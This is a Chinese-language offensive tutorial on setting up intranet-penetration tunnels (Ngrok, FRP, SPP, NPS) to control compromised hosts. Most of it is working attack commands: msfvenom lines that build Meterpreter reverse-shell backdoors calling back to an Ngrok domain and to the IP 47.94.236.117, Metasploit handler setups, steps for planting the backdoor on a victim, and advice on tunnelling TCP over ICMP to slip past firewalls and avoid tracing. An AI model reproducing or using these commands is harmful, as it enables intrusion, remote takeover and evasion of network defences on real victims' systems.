旨在代理连接肉鸡后实现本地渗透肉鸡网络架构
Linux:Proxychains
Windows:Sockscap Proxifier
穿透项目:Ngrok Frp Spp Nps EW(停更)
优点:穿透加密数据,中间平台,防追踪,解决网络问题
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm
#内网穿透-Ngrok-入门-上线
https://www.ngrok.cc/
支持的协议:tcp、http、https
支持的类型:正向代理、反向代理
1、服务端配置:
开通隧道-TCP 协议-指向 IP 和端口-开通隧道-连接隧道
2、客户端(攻击者主机)连接服务端:
./sunny clientid 133328291918(隧道id) //控制端连接 Ngrok 的服务器
将下图的内容上传到攻击者主机,
3、客户端生成后门配置监听:
注意生成的是tcp协议后门,生成木马是使用的是ngrok平台提供的域名
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o ngrok.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 2222
run
攻击者主机使用隧道号与平台建立连接,受害者主机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到攻击者主机上,实现内网穿透。
攻击者主机打开msf开启监听,监听端口是刚生成隧道的本地端口2222,然后服务器点击木马即可上线
#内网穿透-Frp-简易型-上线
https://github.com/fatedier/frp
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS
等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公
网。
自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common]
bind_port = 7000
启动服务端:
./frps -c ./frps.ini
看我这篇文章详细介绍使用
frp搭建隧道-CSDN博客
内网穿透-Spp-特殊协议-上线
https://github.com/esrrhs/spp
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理
在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,
但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。
防火墙对tcp的出站封杀,然后我们这里利用spp这个项目把tcp封装成icmp出网,icmp协议到攻击机成功上线
1、服务端: 监听本地icmp流量
./spp -type server -proto ricmp -listen 0.0.0.0
2、客户端: 将本地8082端口流量转发至47.94.236.117 8081端口上(TCP封装成ICMP)
spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp
3、CS
监听器1:http 47.94.236.117 8081
监听器2:http 127.0.0.1 8082
生成后门:监听器2
将后门上传至受害者主机执行
内网穿透-nps-特殊协议-上线
内网渗透—隧道搭建&SPP与NPS内网穿透_spp代理上线cs-CSDN博客
注意服务端与客户端版本一致
nps默认配置文件使用了80,443,8080,8024端口
80与443端口为域名解析模式默认端口
8080为web管理访问端口
8024为网桥端口,用于客户端与服务器通信 默认账号密码:admin/123
1、启动
./nps install
./nps
访问vps的8080端口,默认账号密码:admin/123
2、创建客户端,生成密匙
3、添加协议隧道,绑定指向
-客户端:
1、连接服务端:
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v #创建客户端后自动生成密钥
2、生成后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe
3、监听后门:
攻击者监听自己电脑本地的6666端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run